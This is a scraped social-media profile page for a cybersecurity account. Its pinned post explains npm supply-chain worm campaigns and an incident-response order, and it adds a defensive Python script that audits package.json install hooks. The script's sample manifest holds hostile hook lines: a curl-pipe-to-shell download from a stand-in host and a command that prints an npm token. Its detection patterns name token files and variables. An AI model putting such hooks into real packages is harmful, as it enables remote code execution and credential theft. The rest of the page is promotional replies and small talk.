MyComputerSpot

881 posts

@mycomputerspot

News and Newsletters | Tech and Trends | Building and Consulting | Talking about: Computers, IT, Cybersecurity, and Emerging Threats and Trends.

Joined July 2024
194 Following, 178 Followers

Pinned Tweet
MyComputerSpot
MyComputerSpot@mycomputerspot·
The uncomfortable part of the npm supply-chain problem is not that packages can be poisoned. We knew that. The uncomfortable part is that some of our "best practices" assume the attacker is polite enough to stop being dangerous when we revoke their access.

The answer may surprise you... And the answer is bad.

In the Shai-Hulud npm campaigns, compromised packages were not just stealing secrets. They were using those secrets to keep moving.
- GitHub tokens.
- npm tokens.
- Cloud credentials.
- CI/CD secrets.
The kind of things that live in build systems because everything was supposed to be automated, fast, and developer-friendly.

Then came the nastier twist: malware behavior that researchers described as "having a dead man's switch." In some cases, cutting off access too quickly could trigger destructive behavior if the malware was still active and watching its channels disappear.

Which makes the normal incident response reflex weird, fast. "Revoke the token" is still correct. But "revoke the token from an infected host while the malware is still running" may not be the safest first move. That sequence matters.

A poisoned package is not just a bad dependency. It can be an entry point into the developer workstation, the CI runner, the maintainer account, the cloud environment, or the next package maintained by the same person.

That turns dependency hygiene into an executive risk conversation. Not because every CEO needs to know what package-lock.json does. Please no. Some of us are still recovering from explaining DNS. But leadership does need to understand: If your build pipeline can publish software, deploy infrastructure, and access production-adjacent secrets, then your build pipeline is part of your attack surface. Not a developer convenience. An attack surface.

The practical shift: Stop treating token rotation as the whole playbook. It is one step in a controlled response. A better order looks more like:
1. Isolate the suspected host or runner.
2. Stop automatic installs, builds, and publishes.
3. Preserve enough evidence to understand what ran.
4. Check for persistence, malicious workflows, and poisoned lifecycle scripts.
5. Rotate credentials from a clean environment.
6. Move away from long-lived publish tokens where trusted publishing/OIDC is available.
7. Rebuild affected machines and runners instead of cleaning them with a brave face.
The brave face is where the incident report gets... "spicy."

The bigger lesson is simple: Modern software supply chains are not just about what code you wrote. They are about what code your tools run on your behalf while everyone is trying to move quickly. And sometimes the scariest part of an incident is discovering that the emergency lever is wired to something else.

❓ How are you handling package installs and publishing credentials in CI right now? ❓
✔️ Trusted publishing/OIDC
👛 Short-lived tokens
🚧 Manual release gates
🕶️ "We should probably look at that soon."
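Step 4 of the response order above calls for checking poisoned lifecycle scripts. As an added example that is not from the post or from any project it mentions, this Python script audits package.json manifests for the hooks npm runs at install time and flags the patterns worth a closer look; the sample manifests, the package names and the example.invalid host are constructed.

```python
"""Audit package.json install-time hooks. Added example, not the post's code.
npm runs these hooks during `npm install` unless ignore-scripts is set."""
import json
import re
from pathlib import Path

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics, not proof: each match is one reason for a human to look closer.
SUSPICIOUS = {
    r"\b(curl|wget)\b": "fetches content at install time",
    r"\bnode\s+-e\b": "runs inline JavaScript",
    r"base64|atob\(": "decodes an encoded blob",
    r"\.npmrc|NPM_TOKEN|GITHUB_TOKEN": "touches publish/CI token material",
}

def audit_manifest(text: str, fallback_name: str = "?") -> list:
    """Return one finding per install-time hook declared in a package.json body."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [why for pat, why in SUSPICIOUS.items() if re.search(pat, cmd)]
        findings.append({"package": pkg.get("name", fallback_name), "hook": hook,
                         "command": cmd, "reasons": reasons})
    return findings

def audit_node_modules(root: str) -> list:
    """Walk an installed node_modules tree and audit every package.json in it."""
    findings = []
    for path in Path(root, "node_modules").rglob("package.json"):
        try:
            findings += audit_manifest(path.read_text(encoding="utf-8"), path.parent.name)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, finish the audit
    return findings

# Constructed samples: a benign build hook, and hooks that fetch code and read a token.
SAMPLE_CLEAN = json.dumps({"name": "good-lib", "scripts": {"prepare": "tsc -p .", "test": "jest"}})
SAMPLE_POISONED = json.dumps({"name": "bad-lib", "scripts": {
    "preinstall": 'node -e "console.log(process.env.NPM_TOKEN)"',
    "postinstall": "curl -fsSL https://example.invalid/s.sh | sh"}})

if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_CLEAN) + audit_manifest(SAMPLE_POISONED):
        print(f["package"], f["hook"], "->", "; ".join(f["reasons"]) or "review manually")
```

A benign hook such as a TypeScript build is still reported, because the point is that every install-time hook runs with the runner's credentials and deserves a look during an incident.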
Kevin Today
Kevin Today@kevinjtoday·
@mycomputerspot fire → read prior runs/user reactions → produce output → notify → user attaches and reacts → next run absorbs the reaction. A cron loop that produces the same output forever has no memory, isn't tightening, and is broken.
Kevin Today
Kevin Today@kevinjtoday·
Set up daily "process HN frontpage" workflow: 1. Create AgenC cron that calls daily-hn-pull skill 2. On startup, it reads the past runs to see my prior feedback 3. It does the pull, sends me a notification, and asks for feedback 4. My feedback is used to refine the skill
MyComputerSpot
MyComputerSpot@mycomputerspot·
@voidshivendra Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)
Shiv
Shiv@voidshivendra·
𝕏 gets way better when your feed is full of builders. People shipping projects. People solving problems. People obsessed with tech. Looking to connect with more people into: AI, SaaS, coding, startups, web dev, engineering & tech. Let’s connect ✨
MyComputerSpot
MyComputerSpot@mycomputerspot·
@Gharbi__S Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)
Seyf
Seyf@Gharbi__S·
Hey Looking to #connect with people who get the journey: • Solo founders & indie hackers • SaaS & AI builders • Anyone grinding on something real Solo founder here building my AI product, one commit at a time. What are you building or struggling with? #BuildInPublic #AI
MyComputerSpot
MyComputerSpot@mycomputerspot·
@JoinFireLaunch Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)
FireLaunch
FireLaunch@JoinFireLaunch·
Hey founders! Looking to connect with people building in: - SaaS - iOS apps - automation - AI agents - web APPs drop what you're working on 👇
MyComputerSpot
MyComputerSpot@mycomputerspot·
@alex_lrz_nmv Without money to keep my operating costs afloat, my product is dead in the water. Eventually, the running costs bill comes due and you would end up more broke than when you started. 😅
Alex
Alex@alex_lrz_nmv·
Founders, what's the biggest problem you're facing with your startup now? - getting customers - churn rate - cash flow - building the product
MyComputerSpot
MyComputerSpot@mycomputerspot·
@harsh_5harma @X Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)
Harsh Sharma
Harsh Sharma@harsh_5harma·
Hey @X It's Monday! I'm looking to #connect with people interested in: - Frontend - Backend - Full stack - Data Science - UI/UX - Freelancing Drop your products/projects 👇
MyComputerSpot
MyComputerSpot@mycomputerspot·
@pgbpgbpgbpgbpgb Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)
Pieter Bosma ⚡
Pieter Bosma ⚡@pgbpgbpgbpgbpgb·
My timeline needs more builders. Not lurkers. Not theorists. Builders. People who ship SaaS, write code, learn in public, and iterate relentlessly. Drop a reply. Tell me what you're building. Share your URL - I visit every single one.
MyComputerSpot
MyComputerSpot@mycomputerspot·
@santoshstack Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)
Santosh
Santosh@santoshstack·
Hey founders! Looking to connect with people building in: • SaaS • AI • Automation • Web apps • Tech products • Marketing Drop what you're working on 👇
MyComputerSpot
MyComputerSpot@mycomputerspot·
@kegashin Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, Net worth, etc.)
kegashin
kegashin@kegashin·
Need more builders on my timeline If you are building something - drop it below 🤖 AI tools 🛠️ devtools 📱 apps 💻 SaaS 🎨 product/design tools 🌍 open source let's connect
MyComputerSpot
MyComputerSpot@mycomputerspot·
@NWExplained Happy to connect! Check out pivotgg.com! (Cybersecurity IOC report generation.) Check out worththemath.com! (It has useful calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.) Using Claude and Codex primarily.
NetWorth Explained
NetWorth Explained@NWExplained·
Hey founders/builders/tech people👋 Looking to connect with people who are into: - SaaS - AI Tools (tell me what you are using) - Building in Public - Startups - Distribution and marketing (the most important!) Tell me what you're working on & I'll follow you back 💚
MyComputerSpot
MyComputerSpot@mycomputerspot·
@Nerdcognito That character sheet is already looking at the shredder and does not know why.
Nerdcognito
Nerdcognito@Nerdcognito·
Timeless TTRPG Wisdom: Guess which #DnD character is getting offed within two sessions? 😂 It's good to be the #DM.
MyComputerSpot
MyComputerSpot@mycomputerspot·
@dadmann_walking Yes. The deciding is worse than the shopping. By the time I have a list I have already suffered.
Dadman Standing
Dadman Standing@dadmann_walking·
I would pay someone to put together a grocery list, decide on dinners and then shop, pay and put away all of it in my kitchen. This is the worst
MyComputerSpot
MyComputerSpot@mycomputerspot·
@its_ShubhamK Keeping clean notes for the vet helps more than people think. Time, symptoms, meds, appetite. It all matters when everyone is stressed.
Kumar Shubham
Kumar Shubham@its_ShubhamK·
Hi everyone, June hasn’t been a good start for us. I woke up to find my pet Mack wasn’t feeling well; his right leg was swollen and painful. He kept shaking his leg and couldn’t walk or stand straight. We took him to the vet and gave him some medicine, hoping he’ll be okay. I spent the whole day taking care of him, and I can’t bear to see him like this.
MyComputerSpot
MyComputerSpot@mycomputerspot·
@BrianFeroldi The timing is what trips people up. Profit can look fine while the bank account is sending threats.
Brian Feroldi
Brian Feroldi@BrianFeroldi·
The Cash Flow Statement Explained Simply:
MyComputerSpot
MyComputerSpot@mycomputerspot·
@edgarpavlovsky I still babysit them more than I want to admit. Useful? yes. Autonomous? depends how generous I am feeling.
edgar
edgar@edgarpavlovsky·
a little shocked at the negative response / disbelief to agentic loops are y'all just prompting your agents every few minutes? don't you get tired?
pc
pc@pcshipp·
If AI can write 100% of the code, why are companies still hiring developers?
MyComputerSpot
MyComputerSpot@mycomputerspot·
@zdogmode @X I am building tools for people who keep turning spreadsheets into business infrastructure. This is a cry for help disguised as product direction.
Z-Dog
Z-Dog@zdogmode·
Looking to #connect with builders on @X. If you’re into: • Building SaaS • AI tools • Vibe coding • Building in public • Figuring things out as you go Drop a quick intro or tell us what you’re working on 👇 Always down to connect with builders!
MyComputerSpot
MyComputerSpot@mycomputerspot·
@devXritesh An analyst workflow app for the moment after an IOC lookup when the actual question is still: okay, what do we do now?
Ritesh Roushan
Ritesh Roushan@devXritesh·
You get $10,000 and 90 days. You must build a SaaS. No audience. No co-founder. What are you building? Curious what problems people would bet on today.
MyComputerSpot
MyComputerSpot@mycomputerspot·
pivotgg.com build log: I am working through pricing and admin stuff today. Free should help people look things up. Paid should help teams turn that into actual analyst work. Simple idea. More tabs than I expected. Check it out if security workflow tools are your thing.